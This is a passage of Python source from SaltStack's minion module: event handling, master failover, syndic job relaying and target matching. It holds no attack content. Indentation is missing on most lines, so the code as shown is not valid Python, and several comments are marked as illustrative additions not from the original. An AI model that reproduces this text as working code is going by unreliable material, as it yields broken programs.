log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
        Manage the minion's schedule based on the event data.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
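        # 'data' is the event payload; an illustrative (not from the source)
        # example would be:
        #   {'func': 'add', 'persist': True,
        #    'schedule': {'job1': {'function': 'test.ping', 'seconds': 3600}}}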
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
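        # 'data' is the event payload, e.g. {'func': 'enable_beacon',
        # 'name': 'ps'} (illustrative example only).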
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
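        # e.g. data = {'environ': {'FOO': 'bar'}, 'false_unsets': False}
        # (illustrative example only)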
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
                logging.DEBUG if salt.utils.platform.is_windows() else logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
            # if the master disconnect event is for a different master, ignore it
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
                # not our master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
                    raise SaltException('Bad master \'{0}\' when failing back; current master is \'{1}\''.format(
                        data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
                elif data['master'] == self.opts['master']:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
                    # delete the scheduled job so it does not interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
                        # make the schedule use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
            # handle this event only once, otherwise it will pollute the log.
            # Also, if the master type is failover, all the reconnection work is
            # done by the `disconnected` event handler and this event should
            # never happen; check it anyway to be sure.
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
                        log.debug(
                            'Enabling the grains refresher. Will run every %s minutes.',
                            self.opts['grains_refresh_every']
                        )
                    else:  # Clean up minute vs. minutes in log message
                        log.debug(
                            'Enabling the grains refresher. Will run every %s minute.',
                            self.opts['grains_refresh_every']
                        )
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
                log.error(
                    'Exception occurred in attempt to initialize grain refresh '
                    'routine during minion tune-in: %s', exc
                )
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
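        # 'ping_interval' is configured in minutes; the default of 0 disables
        # the periodic master ping.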
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
                    log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
                # When filtering is enabled, we'd like to know when the minion sees something it shouldn't
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
        # force auth_safemode True because the Syndic does not support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
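        # The differing defaults (0 vs. 1) make the comparison true when no
        # master_id is attached, so unmarked jobs are always forwarded.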
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
        # We borrowed the local client's poller, so give it back before
        # it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
    Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
        # List of delayed job_rets which we were unable to send for some reason
        # and which will be resent to any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
        # if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
        Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
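            # Only one publish future is kept in flight per master; if the
            # previous one is still pending, wait for the targeted master or
            # fall back to the next one.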
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
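        # Yield the requested master first (falling back to the first option
        # when it is unknown), then the remaining masters, optionally shuffled.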
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
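        # Job return tags look like 'salt/job/<jid>/ret/<minion_id>', which is
        # what the tag_parts checks below are matching.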
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
            # if we are the top-level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
    Used to evaluate whether target expressions from the master match this minion
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: %s', matcher)
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: %s', tgt)
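        # e.g. tgt = 'os:Ubuntu' matches minions whose 'os' grain globs to
        # 'Ubuntu' (illustrative example only)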
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
